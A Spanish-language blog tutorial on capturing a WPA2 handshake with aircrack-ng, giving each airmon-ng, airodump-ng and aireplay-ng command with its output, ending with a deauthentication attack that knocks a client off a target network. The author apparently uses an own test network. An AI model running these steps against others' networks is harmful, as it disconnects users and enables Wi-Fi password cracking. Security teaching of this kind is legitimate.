Captura de Handshake usando la suit de Aircrack-ng

En este post te enseñaré a capturar un handshake de una red wifi utilizando la suite Aircrak-ng con el método de desautenticación.

Un handshake es una petición entre un cliente y un punto de acceso para establecer una conexión. Cuando capturamos un Handshake, no se captura la contraseña, sino una serie de parámetros, donde está la contraseña Wifi pero cifrada.

Antes de empezar

Para la captura del handshake, es necesario tener un adaptador wifi que permita habilitar el modo monitor, esto es necesario para poner nuestro adaptador en modo escucha. En este caso yo estoy utilizando un adaptador de la marca Alfa, modelo AWUS1900, para más información sobre adaptadores puedes consultar las recomendaciones de la página de aircrack-ng o el listado de kalitut

Punto de inicio

Lo primero que necesitamos hacer es identificar nuestras interfaces, para ello utilizaremos el comando iwconfig:

┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$iwconfig       
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:"Hello_world"  
          Mode:Managed  Frequency:5.24 GHz  Access Point: 50:77:B3:EE:65:33   
          Bit Rate=292.5 Mb/s   Tx-Power=17 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          Link Quality=52/70  Signal level=-58 dBm  
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

wlx00c0caab5835  unassociated  Nickname:"WIFI@RTL8814AU"
          Mode:Managed  Frequency=2.412 GHz  Access Point: Not-Associated   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=0/100  Signal level=0 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Esto nos sirve para identificar cuál es el adaptador con el que trabajaremos, en mi caso es: wlx00c0caab5835 también podemos ver en que estado se encuentra: Mode:Managed

Matar los procesos que interfieren

El siguiente paso consiste en matar los procesos que interfieren con la suite de Aircrak-ng, podrían causar un mal funcionamiento, para ello ejecutamos el comando sudo airmon-ng check kill:

┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$sudo airmon-ng check kill
[sudo] password for masiouslow: 

Killing these processes:

    PID Name
    798 wpa_supplicant

El parámetro check lista los procesos que interfieren, kill los elimina.

Modo monitor

Ahora activaremos el modo monitor, esto permite que nuestro adaptador pueda capturar paquetes.

Para activar el modo monitor existen varias opciones, esta vez lo haré con la herramienta airmon-ng.

Introducimos en la terminal el siguiente comando sudo airmon-ng start wlx00c0caab5835 en tu caso has de substituir wlx00c0caab5835 por el nombre de tu adaptador.

┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$sudo airmon-ng start wlx00c0caab5835
[sudo] password for masiouslow: 


PHY	Interface	Driver		Chipset

phy0	wlan0		rtw_8822be	Realtek Semiconductor Co., Ltd. RTL8822BE 802.11a/b/g/n/ac WiFi adapter
phy1	wlx00c0caab5835	rtl8814au	Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac
		(monitor mode enabled)

Es posible que al ejecutar este comando el nombre del adaptador cambie y se agregue la terminación mon al nombre original, en mi caso no, pero se ha de tener en cuenta.

Para verificar que lo hemos hecho correctamente podemos escribir de nuevo iwconfig:

┌[parrot]─[00:00-00/00]─[/home/masiouslow]
└╼masiouslow$iwconfig       
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Frequency:5.24 GHz  Access Point: Not-Associated   
          Tx-Power=23 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:on
          
wlx00c0caab5835  IEEE 802.11AC  ESSID:"MIWIFI_d6hP"  Nickname:"WIFI@RTL8814AU"
          Mode:Monitor  Frequency:2.457 GHz  Access Point: 50:78:B3:EE:61:35   
          Sensitivity:0/0  
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality=1/100  Signal level=-99 dBm  Noise level=0 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Después de esto vemos que el estado ya ha cambiado a modo monitor Mode:Monitor

Descubrir redes wifi disponibles

Para fijar un objetivo primero necesitamos escanear los puntos de acceso que tenemos a nuestro alcance.

Lo que haremos ahora será listar los puntos de acceso de toda la red, aparte de definir un objetivo claro nos permite tener un poco más de información

el comando para realizar este listado es sudo airodump-ng wlx00c0caab5835 pero recuerda que dependiendo del nombre de tu adaptador tendrás que cambiar el último parámetro:

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
                                                                                   
 1C:B0:44:4C:CD:2F  -47       62        0    0   11  195   WPA2 CCMP   PSK  Atacks_this
 
 43-05-D9-79-A0-11  -73       60       16    0   1  130   WPA2 CCMP   PSK  Test_1
 
 23-C9-8C-B7-B5-18  -72       66       13    0   6  130   WPA2 CCMP   PSK  Test_2 
 
 64-FE-B8-8E-FB-F7  -75       62        5    0   1  130   WPA2 CCMP   PSK  Test_3
 
 96-BD-08-0E-FD-AA  -76       70       18    0  11  130   WPA2 CCMP   PSK  Test_4
 
 BA-F0-C0-20-C1-23  -76       38        9    0  11  130   WPA2 CCMP   PSK  Test_5
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 F4:69:42:90:FD:AF  7C-1D-00-52-8F-68  -83    0 - 1      0        2

Una vez listado nuestro objetivo podemos detener el proceso de búsqueda Ctrl+C:

Quitting...

Una vez hecho esto vamos a recolectar la información que nos será útil al momento de capturar el handshake.

Lo que vamos a necesitar es la dirección mac de la red (BSSID) y el canal (CH) los demás datos nos aportan también mucha información, si quieres profundizar en el tema te recomiendo que visites la guía de Airodump-ng

La red que voy a atacar es la que se llama Atacks_this como podemos ver el BSSID es 1C:B0:44:4C:CD:2F y está en el canal 11.

Nos centramos en el objetivo

Con los datos previamente obtenidos vamos a escanear solamente a nuestro objetivo, esto nos permite ver con facilidad los clientes que están conectados a la red. Lo podemos hacer con el mismo comando de antes, pero agregando -d más el BSSID sudo airodump-ng wlx00c0caab5835 -d 1C:B0:44:4C:CD:2F:

CH 1 ][ Elapsed: 24 s ][ 2022-03-06 20:45

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

1C:B0:44:4C:CD:2F -28 85 0 0 11 130 WPA2 CCMP PSK Try_to_hack_this

BSSID STATION PWR Rate Lost Frames Notes Probes

Podemos ver que ahora solo nos muestra la red a la que queremos atacar, si nos fijamos en la segunda fila, debajo de donde pone STATION no aparece nada, eso es porque no hay ningún cliente conectado a la red, voy a conectar un móvil para que veas la diferencia:

CH 2 ][ Elapsed: 0 s ][ 2022-03-06 20:52

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

1C:B0:44:4C:CD:2F -29 15 3 0 11 130 WPA2 CCMP PSK Try_to_hack_this

BSSID STATION PWR Rate Lost Frames Notes Probes

1C:B0:44:4C:CD:2F 28:16:7F:6D:4C:2C -45 0 - 1e 141 23

Ahora sí, vemos que hay un cliente 28:16:7F:6D:4C:2C conectado al punto de acceso

Con esto ya tendríamos todos los datos que necesitamos para la captura del handshake

A la espera de un handshake

A continuación nos vamos a poner en escucha, a la espera de capturar un handshake. Abrimos una nueva ventana y ejecutamos este comando sudo airodump-ng -w test1 -c 11 --bssid 1C:B0:44:4C:CD:2F wlx00c0caab5835:

 CH  1 ][ Elapsed: 2 mins ][ 2022-03-19 20:32 ][ fixed channel wlx00c0caab5835: 2 

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 1C:B0:44:4C:CD:2F  -27  14      305       16    0  11  130   WPA2 CCMP   PSK  Try_to_hack_this                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 1C:B0:44:4C:CD:2F  28:16:7F:6D:4C:2C  -30    1e- 1e   125      137 

En -w test asignamos el nombre del archivo con el que queremos que se guarde nuestro handshake.

Con -c 11 escogemos el canal en el que opera nuestro objetivo

Asignamos el punto de acceso con --bssid 1C:B0:44:4C:CD:2F

Y por último seleccionamos nuestro adaptador de red wlx00c0caab5835

Ahora podríamos recolectar el handshake de una forma pasiva esperando a que algún dispositivo se autentifique en la red, pero esto puede tardar mucho

Ataque de desautenticación

A continuacion, vamos a desautentificar a un dispositivo de la red, esto forzará a que se vuelva a autentificar y capturar así el handshake

En otra ventana ejecutamos el comando sudo aireplay-ng -0 1 -a 1C:B0:44:4C:CD:2F -c 28:16:7F:6D:4C:2C wlx00c0caab5835

Hasta aquí el post, espero que te haya gustado y te sea útil

Si te gusta el trabajo que estoy haciendo y te gustaría apoyarme puedes hacerlo con una donación en bitcoin

Updated: